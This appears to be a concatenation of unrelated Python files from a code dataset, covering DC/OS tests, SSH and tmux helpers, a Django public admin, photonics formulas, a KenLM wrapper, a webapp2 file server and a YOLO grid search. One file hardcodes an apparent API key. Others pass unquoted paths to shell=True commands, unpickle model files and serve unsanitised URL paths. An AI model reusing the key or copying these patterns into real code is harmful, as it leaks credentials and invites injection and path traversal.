cleanup_nfs()
def test_if_marathon_pods_can_be_deployed_with_mesos_containerizer(dcos_api_session: DcosApiSession) -> None:
"""Marathon pods deployment integration test using the Mesos Containerizer
This test verifies that a Marathon pods can be deployed.
"""
test_uuid = uuid.uuid4().hex
# create pod with trivial apps that function as long running processes
pod_definition = {
'id': '/integration-test-pods-{}'.format(test_uuid),
'scaling': {'kind': 'fixed', 'instances': 1},
'environment': {'PING': 'PONG'},
'containers': [
{
'name': 'ct1',
'resources': {'cpus': 0.1, 'mem': 32},
'image': {'kind': 'DOCKER', 'id': 'debian:stretch-slim'},
'exec': {'command': {'shell': 'touch foo; while true; do sleep 1; done'}},
'healthcheck': {'command': {'shell': 'test -f foo'}}
},
{
'name': 'ct2',
'resources': {'cpus': 0.1, 'mem': 32},
'exec': {'command': {'shell': 'echo $PING > foo; while true; do sleep 1; done'}},
'healthcheck': {'command': {'shell': 'test $PING = `cat foo`'}}
}
],
'networks': [{'mode': 'host'}]
}
with dcos_api_session.marathon.deploy_pod_and_cleanup(pod_definition):
# Trivial app if it deploys, there is nothing else to check
pass
|
40105
|
import pexpect
class SshConnection:
'''
To use, set conn_cmd in your json to "ssh [email protected] -i ~/.ssh/id_rsa""
and set connection_type to "ssh"
'''
def __init__(self, device=None, conn_cmd=None, ssh_password='<PASSWORD>', **kwargs):
self.device = device
self.conn_cmd = conn_cmd
self.ssh_password = <PASSWORD>_password
def connect(self):
pexpect.spawn.__init__(self.device,
command='/bin/bash',
args=['-c', self.conn_cmd])
try:
result = self.device.expect(["assword:", "passphrase"] + self.device.prompt)
except pexpect.EOF as e:
raise Exception("Board is in use (connection refused).")
if result == 0 or result == 1:
assert self.ssh_password is not None, "Please add ssh_password in your json configuration file."
self.device.sendline(self.ssh_password)
self.device.expect(self.device.prompt)
def close(self):
self.device.sendline('exit')
|
40115
|
from config import *
from helper_func import *
class coordinates_data_files_list(object):
def __init__(self,
list_of_dir_of_coor_data_files = CONFIG_1, # this is the directory that holds corrdinates data files
):
assert (isinstance(list_of_dir_of_coor_data_files, list)) # to avoid passing the string in the constructor
self._list_of_dir_of_coor_data_files = list_of_dir_of_coor_data_files
self._list_of_coor_data_files = []
for item in self._list_of_dir_of_coor_data_files:
self._list_of_coor_data_files += subprocess.check_output('''find %s -name "*coordinates.npy"''' % item, shell=True).decode("utf-8").strip().split('\n')
self._list_of_coor_data_files = list(set(self._list_of_coor_data_files)) # remove duplicates
self._list_of_coor_data_files = [x for x in self._list_of_coor_data_files if os.stat(x).st_size > 0] # remove empty files
self._list_of_coor_data_files.sort() # to be consistent
self._list_num_frames = [np.load(_1).shape[0] for _1 in self._list_of_coor_data_files]
return
def create_sub_coor_data_files_list_using_filter_conditional(self, filter_conditional):
"""
:param filter_conditional: a lambda conditional expression on file names
:return: a coordinates_data_files_list object
"""
temp_coor_files = list(filter(filter_conditional, self._list_of_coor_data_files))
return coordinates_data_files_list(temp_coor_files)
def get_list_of_coor_data_files(self):
return self._list_of_coor_data_files
def get_coor_data(self, scaling_factor, format='npy'):
result = np.concatenate([
Helper_func.load_npy(item, format=format) for item in self._list_of_coor_data_files], axis=0) / scaling_factor
assert (sum(self._list_num_frames) == result.shape[0])
return result
def get_list_of_corresponding_pdb_dcd(self):
list_of_corresponding_pdb_files = [x.strip().replace('_coordinates.npy', '.pdb') for x in self.get_list_of_coor_data_files()]
for item in range(len(list_of_corresponding_pdb_files)):
if not os.path.exists(list_of_corresponding_pdb_files[item]):
list_of_corresponding_pdb_files[item] = list_of_corresponding_pdb_files[item].replace('.pdb', '.dcd')
try:
assert os.path.exists(list_of_corresponding_pdb_files[item])
except:
raise Exception('%s does not exist!' % list_of_corresponding_pdb_files[item])
return list_of_corresponding_pdb_files
def write_pdb_frames_into_file_with_list_of_coor_index(self, list_of_coor_index, out_file_name, verbose=True):
"""
This function picks several frames from pdb files, and write a new pdb file as output,
we could use this together with the mouse-clicking callback implemented in the scatter plot:
first we select a few points interactively in the scatter plot, and get corresponding index in the data point
list, the we find the corresponding pdb frames with the index
"""
Helper_func.backup_rename_file_if_exists(out_file_name)
list_of_coor_index.sort()
pdb_files = self.get_list_of_corresponding_pdb_dcd()
accum_sum = np.cumsum(np.array(self._list_num_frames)) # use accumulative sum to find corresponding pdb files
for item in range(len(accum_sum)):
if item == 0:
temp_index_related_to_this_pdb_file = [x for x in list_of_coor_index if x < accum_sum[item]]
else:
temp_index_related_to_this_pdb_file = [x for x in list_of_coor_index if accum_sum[item - 1] <= x < accum_sum[item]]
temp_index_related_to_this_pdb_file = [x - accum_sum[item - 1] for x in temp_index_related_to_this_pdb_file]
temp_index_related_to_this_pdb_file.sort()
if len(temp_index_related_to_this_pdb_file) != 0:
if verbose: print(pdb_files[item])
with open(pdb_files[item], 'r') as in_file:
content = in_file.read().split('MODEL')[1:] # remove header
frames_to_use = [content[ii] for ii in temp_index_related_to_this_pdb_file]
with open(out_file_name, 'a') as out_file:
for frame in frames_to_use:
out_file.write("MODEL" + frame)
return
def get_pdb_name_and_corresponding_frame_index_with_global_coor_index(self, coor_index):
for item, temp_pdb in zip(self._list_num_frames, self.get_list_of_corresponding_pdb_dcd()):
if coor_index < item: break
else: coor_index -= item
return temp_pdb, coor_index
def concat_all_pdb_files(self, out_pdb_file):
"""
Why don't I use 'cat' in terminal? since I want to make order consistent with Python sort() function
"""
with open(out_pdb_file, 'w') as outfile:
for fname in self.get_list_of_corresponding_pdb_dcd():
with open(fname) as infile:
outfile.write(infile.read())
return
|
40116
|
from django.contrib.admin import ModelAdmin
from public_admin.sites import PublicAdminSite
class PublicModelAdmin(ModelAdmin):
"""This mimics the Django's native ModelAdmin but filters URLs that should
not exist in a public admin, and deals with request-based permissions."""
def has_view_permission(self, request, obj=None):
"""Only allows view requests if the method is GET"""
return request.method == "GET"
def has_add_permission(self, request):
"""Denies permission to any request trying to add new objects."""
return False
def has_change_permission(self, request, obj=None):
"""Denies permission to any request trying to change objects."""
return False
def has_delete_permission(self, request, obj=None):
"""Denies permission to any request trying to delete objects."""
return False
def get_urls(self):
"""Filter out the URLs that should not exist in a public admin."""
return [url for url in super().get_urls() if PublicAdminSite.valid_url(url)]
|
40146
|
import indicoio, os, json
indicoio.config.api_key = '27df1eee04c5b65fb3113e9458d1d701'
fileDir = os.path.dirname(os.path.realpath('__file__'))
fileResumeTxt = open(os.path.join(fileDir, "data/resume.txt"), 'w')
resume = "data/resumePDF.pdf"
print(json.dumps(indicoio.pdf_extraction(resume)))
|
40226
|
import numpy as np
def directional_coupler_lc(wavelength_nm, n_eff_1, n_eff_2):
'''
Calculates the coherence length (100% power transfer) of a
directional coupler.
Args:
wavelength_nm (float): The wavelength in [nm] the
directional coupler should operate at.
n_eff_1 (float): n_eff of the fundamental (even)
supermode of the directional coupler.
n_eff_2 (float): n_eff of the first-order (odd)
supermode of the directional coupler.
Returns:
float: The length [um] the directional coupler
needs to be to achieve 100% power transfer.
'''
wavelength_m = wavelength_nm * 1.e-9
dn_eff = (n_eff_1 - n_eff_2).real
lc_m = wavelength_m / (2. * dn_eff)
lc_um = lc_m * 1.e6
return lc_um
def grating_coupler_period(wavelength,
n_eff,
n_clad,
incidence_angle_deg,
diffration_order=1):
'''
Calculate the period needed for a grating coupler.
Args:
wavelength (float): The target wavelength for the
grating coupler.
n_eff (float): The effective index of the mode
of a waveguide with the width of the grating
coupler.
n_clad (float): The refractive index of the cladding.
incidence_angle_deg (float): The incidence angle
the grating coupler should operate at [degrees].
diffration_order (int): The grating order the coupler
should work at. Default is 1st order (1).
Returns:
float: The period needed for the grating coupler
in the same units as the wavelength was given at.
'''
k0 = 2. * np.pi / wavelength
beta = n_eff.real * k0
n_inc = n_clad
grating_period = (2.*np.pi*diffration_order) \
/ (beta - k0*n_inc*np.sin(np.radians(incidence_angle_deg)))
return grating_period
def loss(n, wavelength):
kappa = n.imag
alpha = 4.34 * 4 * np.pi * np.abs(
kappa) / wavelength # 4.34 = 10*np.log10(np.e) -> [dB/m] = 4.34 [/m]
return alpha # [db/um] if working in [um]
def qpm_wavenumber(pmp_n,
pmp_l,
sig_n,
sig_l,
idl_n,
idl_l,
period_qpm,
type='forward'):
pi2 = np.pi * 2
k_pmp = pmp_n * pi2 / pmp_l
k_sig = sig_n * pi2 / sig_l
k_idl = idl_n * pi2 / idl_l
k_qpm = pi2 / period_qpm
if type == 'forward':
sgn_1 = 1
sgn_2 = 1
elif type == 'forward_backward':
sgn_1 = 1
sgn_2 = -1
elif type == 'backward':
sgn_1 = -1
sgn_2 = -1
k_mismatch = k_idl * sgn_1 + k_sig * sgn_2 + k_qpm - k_pmp
return k_mismatch
def qpm_period(pmp_n, pmp_l, sig_n, sig_l, idl_n, idl_l, type='forward'):
pi2 = np.pi * 2
k_pmp = pmp_n * pi2 / pmp_l
k_sig = sig_n * pi2 / sig_l
k_idl = idl_n * pi2 / idl_l
if type == 'forward':
sgn_1 = 1
sgn_2 = 1
elif type == 'forward_backward':
sgn_1 = 1
sgn_2 = -1
elif type == 'backward':
sgn_1 = -1
sgn_2 = -1
k_qpm = k_pmp - k_idl * sgn_1 - k_sig * sgn_2
l_qpm = pi2 / k_qpm
return l_qpm
|
40263
|
from abc import ABCMeta
from layers.linear import *
from layers.conv2d import *
import torch.nn as nn
# Add custom layers here.
_STN_LAYERS = [StnLinear, StnConv2d]
class StnModel(nn.Module, metaclass=ABCMeta):
# Initialize an attribute self.layers (a list containing all layers).
def get_layers(self):
raise NotImplementedError
def get_response_parameters(self):
""" Return the response parameters.
:return: List[Tensors]
"""
params = []
for idx, layer in enumerate(self.get_layers()):
for stn_layer in _STN_LAYERS:
if isinstance(layer, stn_layer):
params = params + layer.response_parameters
return params
def get_general_parameters(self):
""" Return the general parameters.
:return: List[Tensors]
"""
params = []
for idx, layer in enumerate(self.get_layers()):
is_stn_layer = False
for stn_layer in _STN_LAYERS:
if isinstance(layer, stn_layer):
is_stn_layer = True
params = params + layer.general_parameters
break
if not is_stn_layer:
params = params + [p for p in layer.parameters()]
return params
def forward(self, x, h_net, h_param):
""" A forward pass for StnModel.
:param x: Input Tensor
:param h_net: Tensor of size 'batch_size x num_hyper'
:param h_param: Tensor of size 'batch_size x num_hyper'
:return: Output Tensor
"""
raise NotImplementedError()
|
40308
|
import frappe
def after_migrate():
set_default_otp_template()
def set_default_otp_template():
if not frappe.db.get_value("System Settings", None, "email_otp_template"):
if frappe.db.exists("Email Template", "Default Email OTP Template"):
# should exists via fixtures
frappe.db.set_value("System Settings", None, "email_otp_template", "Default Email OTP Template")
if not frappe.db.get_value("System Settings", None, "sms_otp_template"):
if frappe.db.exists("SMS Template", "Default SMS OTP Template"):
# should exists via fixtures
frappe.db.set_value("System Settings", None, "sms_otp_template", "Default SMS OTP Template")
|
40315
|
import factory
class ServiceCategoryFactory(factory.django.DjangoModelFactory):
class Meta:
model = "core.ServiceCategory"
name = factory.Sequence(lambda n: f"Service Category {n}")
slug = factory.Sequence(lambda n: f"service-category-{n}")
description = factory.Faker("sentence")
icon = "categories/shelter.png"
class ServiceFactory(factory.django.DjangoModelFactory):
class Meta:
model = "core.Service"
name = factory.Sequence(lambda n: f"Service {n}")
organization_name = factory.Faker("company")
description = factory.Faker("paragraph")
website = factory.Faker("url")
street_address = factory.Faker("street_address")
city = factory.Faker("city")
state = factory.Faker("state_abbr")
zip_code = factory.Faker("postcode")
latitude = factory.Faker("latitude")
longitude = factory.Faker("longitude")
operating_hours = "9am - 5pm Monday-Friday"
phone_number = factory.Faker("phone_number")
email = factory.Faker("email")
category = factory.SubFactory(ServiceCategoryFactory)
|
40348
|
class TransportType:
NAPALM = "napalm"
NCCLIENT = "ncclient"
NETMIKO = "netmiko"
class DeviceType:
IOS = "ios"
NXOS = "nxos"
NXOS_SSH = "nxos_ssh"
NEXUS = "nexus"
CISCO_NXOS = "cisco_nxos"
|
40365
|
import os
import os.path
import webapp2
import logging
from webapp2 import WSGIApplication, Route
from google.appengine.api import users
# hack until we can make this public
cache = dict()
class Content(webapp2.RequestHandler):
def get(self, *args, **kwargs):
urlPath = args[0]
root = os.path.split(__file__)[0]
errorPath = os.path.join(root, '404', 'index.html')
try:
paths = [
os.path.join(root, urlPath + '.html'),
os.path.join(root, urlPath + 'index.html'),
os.path.join(root, urlPath + '/index.html'),
os.path.join(root, urlPath)
]
validPaths = [path for path in paths if os.path.isfile(path)]
if len(validPaths) > 0:
path = validPaths[0]
else:
path = errorPath
self.response.set_status(404)
if path.endswith(".css"):
self.response.headers['Content-Type'] = 'text/css'
elif path.endswith(".js"):
self.response.headers['Content-Type'] = 'application/javascript'
elif path.endswith(".html"):
self.response.headers['Content-Type'] = 'text/html'
elif path.endswith(".svg"):
self.response.headers['Content-Type'] = 'image/svg+xml'
self.response.headers['Cache-Control'] = 'public'
self.response.headers['max-age'] = '300' # 5 minutes
key = 'pages-' + path
if key in cache:
self.response.out.write(cache[key])
else:
f = open(path, 'r')
content = f.read()
cache[key] = content
self.response.out.write(content)
except:
logging.exception("unable to serve page")
path = errorPath
f = open(path, 'r')
content = f.read()
self.response.out.write(content)
self.response.set_status(404)
app = WSGIApplication([
Route(r'/<:.*>', handler=Content)
], debug=True)
|
40373
|
import kenlm
import os
import pickle
import tempfile
import zipfile
from config import KENLM_PATH
from pyro_utils import BGProc
from config import PORT_NUMBER, TEMP_DIR
import time
import subprocess
import shlex
def _unzip_to_tempdir(model_zip_path):
# temp folder (automatically deleted on exit)
tmpdir = tempfile.mkdtemp(dir=TEMP_DIR)
# unzip model into tempdir
with zipfile.ZipFile(model_zip_path, 'r', allowZip64=True) as zip_ref:
zip_ref.extractall(tmpdir)
return tmpdir
def _zip_to_model(tmpdir, model_zip_path):
# make pickle file with model options
# create zipfile archive
zf = zipfile.ZipFile(model_zip_path, 'w', allowZip64=True)
zf.compress_type = zipfile.ZIP_DEFLATED # saw a note that this helps with backwards compat
# Adding files from directory 'files'
for _, _, files in os.walk(tmpdir):
for f in files:
zf.write(os.path.join(tmpdir, f), f)
class AbstractLM(object):
def train(self, path_to_text):
raise NotImplementedError()
def save(self, model_file_name):
raise NotImplementedError()
def load(self, model_file_name):
raise NotImplementedError()
def score(self, sentences):
raise NotImplementedError()
def _assert_initilized(self):
if not hasattr(self, 'tmpdir'):
raise Exception('Did you forget to run train or load first?')
class DummyLM(AbstractLM):
def train(self, path_to_text):
pass
def save(self, model_file_name):
self.tmpdir = tempfile.mkdtemp(dir=TEMP_DIR)
params = dict(model_type='dummy')
pkl_fname = os.path.join(self.tmpdir, 'params.pkl')
with open(pkl_fname, 'w') as fileObject:
pickle.dump(params, fileObject)
_zip_to_model(self.tmpdir, model_file_name)
def load(self, model_file_name):
pass
def score(self, sentences):
return [-42.0 for _ in sentences]
class KenLM(AbstractLM):
"""
implements simple wrapper around kenlm
model is saved as kenlm_model.binary in zip file
model_type is "kenlm"
"""
def wrap_existing_kenlm_model(self, kenlm_model):
if not (kenlm_model.endswith('.binary') or '.binlm' in kenlm_model):
raise Exception('expected file with .binlm* or .binary extension')
self.tmpdir = tempfile.mkdtemp(dir=TEMP_DIR)
model_binary_path = os.path.join(self.tmpdir, 'kenlm_model.binary')
subprocess.check_call('cp %s %s'%(kenlm_model, model_binary_path), shell=True)
self.kenlm_model = kenlm.Model(model_binary_path)
def train(self, path_to_text):
# also stores binary in temp directory
self.tmpdir = tempfile.mkdtemp(dir=TEMP_DIR)
model_arpa_path = os.path.join(self.tmpdir, 'kenlm_model.arpa')
model_binary_path = os.path.join(self.tmpdir, 'kenlm_model.binary')
myinput = open(path_to_text)
myoutput = open(model_arpa_path, 'w')
args = shlex.split(os.path.join(KENLM_PATH, 'bin/lmplz') + ' -o 5 -S 40% --skip_symbols </s> <unk>')
# from kenlm exception: --skip_symbols: to avoid this exception:
# Special word </s> is not allowed in the corpus. I plan to support models containing <unk> in the future.
# Pass --skip_symbols to convert these symbols to whitespace.
p = subprocess.Popen(args, stdin=myinput, stdout=myoutput)
p.wait()
#convert arpa to binary
p = subprocess.Popen(shlex.split('%s %s %s' % (os.path.join(KENLM_PATH, 'bin/build_binary'), model_arpa_path, model_binary_path)))
p.wait()
#remove arpa file
p=subprocess.Popen(shlex.split('rm %s' % model_arpa_path))
p.wait()
#lm_bin = os.path.join(KENLM_PATH, 'bin/lmplz')
#binarize_bin = os.path.join(KENLM_PATH, 'bin/build_binary')
#subprocess.check_call('%s -o 5 -S 40%% > %s' % (lm_bin, model_arpa_path))
#subprocess.check_call('%s %s %s' % (binarize_bin, model_arpa_path, model_binary_path))
#subprocess.check_call('rm %s' % model_arpa_path)
self.kenlm_model = kenlm.Model(model_binary_path)
def save(self, model_file_name):
"""
save trained model to disk
TODO (nice to have): write anything that seems useful (training parameters, date trained, etc) to params.pkl
"""
if not model_file_name.endswith('.zip'):
raise Exception('expected output file to have .zip extension')
self._assert_initilized()
params = dict(model_type='kenlm')
pkl_fname = os.path.join(self.tmpdir, 'params.pkl')
with open(pkl_fname, 'w') as fileObject:
pickle.dump(params, fileObject)
_zip_to_model(self.tmpdir, model_file_name)
def load(self, model_file_name):
self.tmpdir = _unzip_to_tempdir(model_file_name)
self.kenlm_model = kenlm.Model(os.path.join(self.tmpdir, 'kenlm_model.binary'))
def score(self, sentences):
self._assert_initilized()
return [self.kenlm_model.score(sent, bos=True, eos=True) for sent in sentences]
def lm_factory(model_file_name):
"""
Peek inside model and see which language model class should open it,
and return an instantiation of that class, with said model loaded
:param model_file_name: NematusLL language model file (zip containing params.pkl, etc)
:return: instantiated language model class (implements AbstractLM interface)
"""
print 'creating class map'
class_map = dict(kenlm=KenLM,
dummy=DummyLM)
print 'loading pickle file'
with zipfile.ZipFile(model_file_name, 'r') as zf:
with zf.open('params.pkl') as fh:
params = pickle.load(fh)
print 'setting model type'
model_type = params['model_type']
LM_Class = class_map[model_type]
lm = LM_Class()
print 'loading model file'
lm.load(model_file_name)
return lm
|
40389
|
import os
import subprocess
from pathlib import Path
from ..views.viewhelper import delay_refresh_detail
from ..helper.config import config
def edit(filepath: Path, loop):
if isinstance(filepath, str):
filepath = Path(filepath)
editor = os.environ.get('EDITOR', 'vi').lower()
# vim
if editor == 'vi' or editor == 'vim':
cmd = editor + ' ' + str(filepath)
current_directory = Path.cwd()
os.chdir(filepath.parent)
if config.tmux_support and is_inside_tmux():
open_in_new_tmux_window(cmd)
else:
subprocess.call(cmd, shell=True)
delay_refresh_detail(loop)
os.chdir(current_directory)
# sublime text
elif editor == 'sublime':
cmd = 'subl ' + str(filepath)
subprocess.call(cmd, shell=True)
def is_inside_tmux():
return 'TMUX' in os.environ
def open_in_new_tmux_window(edit_cmd):
# close other panes if exist, so that the detail pane is the only pane
try:
output = subprocess.check_output("tmux list-panes | wc -l", shell=True)
num_pane = int(output)
if num_pane > 1:
subprocess.check_call("tmux kill-pane -a", shell=True)
except Exception:
pass
cmd = "tmux split-window -h"
os.system(cmd)
cmd = "tmux send-keys -t right '%s' C-m" % edit_cmd
os.system(cmd)
|
40439
|
import argparse
import os
import mlflow
import numpy as np
import pandas as pd
import torch
import torch.optim as optim
from matplotlib import pyplot as plt
from matplotlib.backends.backend_agg import FigureCanvasAgg
from mlflow import log_metric, log_param, get_artifact_uri
from skimage.io import imsave
from sklearn.model_selection import ParameterGrid
from torch.nn.utils import clip_grad_norm_
from torch.utils.data import DataLoader
from tqdm import tqdm
from dataset import TomoDetectionDataset as Dataset
from dense_yolo import DenseYOLO
from loss import objectness_module, LocalizationLoss
from sampler import TomoBatchSampler
from transform import transforms
def main(args):
torch.backends.cudnn.benchmark = True
device = torch.device("cpu" if not torch.cuda.is_available() else args.device)
loader_train, loader_valid = data_loaders(args)
loaders = {"train": loader_train, "valid": loader_valid}
hparams_dict = {
"block_config": [(1, 3, 2, 6, 4), (2, 6, 4, 12, 8)],
"num_init_features": [8, 16],
"growth_rate": [8, 16],
"bn_size": [2, 4],
}
hparams = list(ParameterGrid(hparams_dict)) # 16 configs
loss_params_dict = [
{"loss": ["CE", "weighted-CE"], "alpha": [0.25, 0.5, 1.0]}, # 6 configs
{"loss": ["focal"], "alpha": [0.25, 0.5, 1.0], "gamma": [0.5, 1.0, 2.0]}, # 9 configs
{
"loss": ["reduced-focal"],
"alpha": [0.25, 0.5, 1.0],
"gamma": [0.5, 1.0, 2.0],
"reduce_th": [0.5],
} # 9 configs
] # 24 configs
loss_params = list(ParameterGrid(loss_params_dict))
loss_params = loss_params * 2 # 48 configs
try:
mlflow.set_tracking_uri(args.mlruns_path)
experiment_id = (
args.experiment_id
if args.experiment_id
else mlflow.create_experiment(name=args.experiment_name)
)
except Exception as _:
print("experiment-id must be unique")
return
for i, loss_param in tqdm(enumerate(loss_params)):
for j, hparam in enumerate(hparams):
with mlflow.start_run(experiment_id=experiment_id):
mlflow_log_params(loss_param, hparam)
try:
yolo = DenseYOLO(img_channels=1, out_channels=Dataset.out_channels, **hparam)
yolo.to(device)
objectness_loss = objectness_module(
name=loss_param["loss"], args=argparse.Namespace(**loss_param)
)
localization_loss = LocalizationLoss(weight=args.loc_weight)
optimizer = optim.Adam(yolo.parameters(), lr=args.lr)
early_stop = args.patience
run_tpr2 = 0.0
run_tpr1 = 0.0
run_auc = 0.0
for _ in range(args.epochs):
if early_stop == 0:
break
for phase in ["train", "valid"]:
if phase == "train":
yolo.train()
early_stop -= 1
else:
yolo.eval()
df_validation_pred = pd.DataFrame()
valid_target_nb = 0
for data in loaders[phase]:
x, y_true = data
x, y_true = x.to(device), y_true.to(device)
optimizer.zero_grad()
with torch.set_grad_enabled(phase == "train"):
y_pred = yolo(x)
obj = objectness_loss(y_pred, y_true)
loc = localization_loss(y_pred, y_true)
total_loss = obj + loc
if phase == "train":
total_loss.backward()
clip_grad_norm_(yolo.parameters(), 0.5)
optimizer.step()
else:
y_true_np = y_true.detach().cpu().numpy()
valid_target_nb += np.sum(y_true_np[:, 0])
df_batch_pred = evaluate_batch(y_pred, y_true)
df_validation_pred = df_validation_pred.append(
df_batch_pred, ignore_index=True, sort=False
)
if phase == "valid":
tpr, fps = froc(df_validation_pred, valid_target_nb)
epoch_tpr2 = np.interp(2.0, fps, tpr)
epoch_tpr1 = np.interp(1.0, fps, tpr)
if epoch_tpr2 > run_tpr2:
early_stop = args.patience
run_tpr2 = epoch_tpr2
run_tpr1 = epoch_tpr1
run_auc = np.trapz(tpr, fps)
torch.save(
yolo.state_dict(),
os.path.join(get_artifact_uri(), "yolo.pt"),
)
imsave(
os.path.join(get_artifact_uri(), "froc.png"),
plot_froc(fps, tpr),
)
log_metric("TPR2", run_tpr2)
log_metric("TPR1", run_tpr1)
log_metric("AUC", run_auc)
except Exception as e:
print(
"{:0>2d}/{} | {} {}".format(
j + 1, len(hparams), hparams[j], type(e).__name__
)
)
def mlflow_log_params(loss_param, hparam):
for key in loss_param:
log_param(key, loss_param[key])
log_param("loss_fun", str(loss_param))
for key in hparam:
log_param(key, hparam[key])
log_param("network", str(hparam))
def data_loaders(args):
dataset_train, dataset_valid = datasets(args)
sampler_train = TomoBatchSampler(
batch_size=args.batch_size, data_frame=dataset_train.data_frame
)
def worker_init(worker_id):
np.random.seed(42 + worker_id)
loader_train = DataLoader(
dataset_train,
batch_sampler=sampler_train,
num_workers=args.workers,
worker_init_fn=worker_init,
)
loader_valid = DataLoader(
dataset_valid,
batch_size=args.batch_size,
drop_last=False,
num_workers=args.workers,
worker_init_fn=worker_init,
)
return loader_train, loader_valid
def datasets(args):
train = Dataset(
csv_views=args.data_views,
csv_bboxes=args.data_boxes,
root_dir=args.images,
subset="train",
random=True,
only_biopsied=args.only_biopsied,
transform=transforms(train=True),
skip_preprocessing=True,
downscale=args.downscale,
max_slice_offset=args.slice_offset,
seed=args.seed,
)
valid = Dataset(
csv_views=args.data_views,
csv_bboxes=args.data_boxes,
root_dir=args.images,
subset="validation",
random=False,
transform=transforms(train=False),
skip_preprocessing=True,
downscale=args.downscale,
max_slice_offset=args.slice_offset,
seed=args.seed,
)
return train, valid
def froc(df, targets_nb):
total_slices = len(df.drop_duplicates(subset=["PID"]))
total_tps = targets_nb
tpr = [0.0]
fps = [0.0]
max_fps = 4.0
thresholds = sorted(df[df["TP"] == 1]["Score"], reverse=True)
for th in thresholds:
df_th = df[df["Score"] >= th]
df_th_unique_tp = df_th.drop_duplicates(subset=["PID", "TP", "GTID"])
num_tps_th = float(sum(df_th_unique_tp["TP"]))
tpr_th = num_tps_th / total_tps
num_fps_th = float(len(df_th[df_th["TP"] == 0]))
fps_th = num_fps_th / total_slices
if fps_th > max_fps:
tpr.append(tpr[-1])
fps.append(max_fps)
break
tpr.append(tpr_th)
fps.append(fps_th)
if np.max(fps) < max_fps:
tpr.append(tpr[-1])
fps.append(max_fps)
return tpr, fps
def plot_froc(fps, tpr, color="darkorange", linestyle="-"):
fig = plt.figure(figsize=(10, 8))
canvas = FigureCanvasAgg(fig)
plt.plot(fps, tpr, color=color, linestyle=linestyle, lw=2)
plt.xlim([0.0, 4.0])
plt.xticks(np.arange(0.0, 4.5, 0.5))
plt.ylim([0.0, 1.0])
plt.yticks(np.arange(0.0, 1.1, 0.1))
plt.tick_params(axis="both", which="major", labelsize=16)
plt.xlabel("Mean FPs per slice", fontsize=24)
plt.ylabel("Sensitivity", fontsize=24)
plt.grid(color="silver", alpha=0.3, linestyle="--", linewidth=1)
plt.tight_layout()
canvas.draw()
plt.close()
s, (width, height) = canvas.print_to_buffer()
return np.fromstring(s, np.uint8).reshape((height, width, 4))
def is_tp(pred_box, true_box, min_dist=50):
# box: center point + dimensions
pred_y, pred_x = pred_box["Y"], pred_box["X"]
gt_y, gt_x = true_box["Y"], true_box["X"]
# distance between GT and predicted center points
dist = np.sqrt((pred_x - gt_x) ** 2 + (pred_y - gt_y) ** 2)
# TP radius based on GT box size
dist_threshold = np.sqrt(true_box["Width"] ** 2 + true_box["Height"] ** 2) / 2.
dist_threshold = max(dist_threshold, min_dist)
# TP if predicted center within GT radius
return dist <= dist_threshold
def evaluate_batch(y_pred, y_true):
y_pred = y_pred.detach().cpu().numpy()
y_true = y_true.detach().cpu().numpy()
df_eval = pd.DataFrame()
for i in range(y_pred.shape[0]):
df_gt_boxes = pred2boxes(y_true[i], threshold=1.0)
df_gt_boxes["GTID"] = np.random.randint(10e10) * (1 + df_gt_boxes["X"])
df_pred_boxes = pred2boxes(y_pred[i])
df_pred_boxes["PID"] = np.random.randint(10e12)
df_pred_boxes["TP"] = 0
df_pred_boxes["GTID"] = np.random.choice(
list(set(df_gt_boxes["GTID"])), df_pred_boxes.shape[0]
)
for index, pred_box in df_pred_boxes.iterrows():
tp_list = [
(j, is_tp(pred_box, x_box)) for j, x_box in df_gt_boxes.iterrows()
]
if any([tp[1] for tp in tp_list]):
tp_index = [tp[0] for tp in tp_list if tp[1]][0]
df_pred_boxes.at[index, "TP"] = 1
df_pred_boxes.at[index, "GTID"] = df_gt_boxes.at[tp_index, "GTID"]
df_eval = df_eval.append(df_pred_boxes, ignore_index=True, sort=False)
return df_eval
def pred2boxes(pred, threshold=None):
# box: center point + dimensions
anchor = Dataset.anchor
cell_size = Dataset.cell_size
np.nan_to_num(pred, copy=False)
obj_th = pred[0]
if threshold is None:
threshold = min(0.001, np.max(obj_th) * 0.5)
obj_th[obj_th < threshold] = 0
yy, xx = np.nonzero(obj_th)
scores = []
xs = []
ys = []
ws = []
hs = []
for i in range(len(yy)):
scores.append(pred[0, yy[i], xx[i]])
h = int(anchor[0] * pred[3, yy[i], xx[i]] ** 2)
hs.append(h)
w = int(anchor[1] * pred[4, yy[i], xx[i]] ** 2)
ws.append(w)
y_offset = pred[1, yy[i], xx[i]]
y_mid = yy[i] * cell_size + (cell_size / 2) + (cell_size / 2) * y_offset
ys.append(int(y_mid))
x_offset = pred[2, yy[i], xx[i]]
x_mid = xx[i] * cell_size + (cell_size / 2) + (cell_size / 2) * x_offset
xs.append(int(x_mid))
df_dict = {"Score": scores, "X": xs, "Y": ys, "Width": ws, "Height": hs}
df_boxes = pd.DataFrame(df_dict)
df_boxes.sort_values(by="Score", ascending=False, inplace=True)
return df_boxes
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description="Hyper-parameters grid search for YOLO model for cancer detection in Duke DBT volumes"
)
parser.add_argument(
"--batch-size",
type=int,
default=16,
help="input batch size for training (default: 16)",
)
parser.add_argument(
"--epochs",
type=int,
default=100,
help="number of epochs to train (default: 100)",
)
parser.add_argument(
"--patience",
type=int,
default=25,
help="early stopping: number of epochs to wait for improvement (default: 25)",
)
parser.add_argument(
"--lr", type=float, default=0.001, help="initial learning rate (default: 0.001)"
)
parser.add_argument(
"--loc-weight",
type=float,
default=0.5,
help="weight of localization loss (default: 0.5)",
)
parser.add_argument(
"--device",
type=str,
default="cuda:1",
help="device for training (default: cuda:1)",
)
parser.add_argument(
"--workers",
type=int,
default=4,
help="number of workers for data loading (default: 4)",
)
parser.add_argument(
"--data-views",
type=str,
default="/data/data_train_v2.csv",
help="csv file listing training views together with category label",
)
parser.add_argument(
"--data-boxes",
type=str,
default="/data/bboxes_v2.csv",
help="csv file defining ground truth bounding boxes",
)
parser.add_argument(
"--images",
type=str,
default="/data/TomoImagesPP/",
help="root folder with preprocessed images",
)
parser.add_argument(
"--seed",
type=int,
default=42,
help="random seed for validation split (default: 42)",
)
parser.add_argument(
"--downscale",
type=int,
default=2,
help="input image downscale factor (default 2)",
)
parser.add_argument(
"--experiment-name",
type=str,
default="0",
help="experiment name for new mlflow (default: 0)",
)
parser.add_argument(
"--experiment-id",
type=str,
default=None,
help="experiment id to restore in-progress mlflow experiment (default: None)",
)
parser.add_argument(
"--mlruns-path",
type=str,
default="/data/mlruns",
help="path for mlflow results (default: /data/mlruns)",
)
parser.add_argument(
"--slice-offset",
type=int,
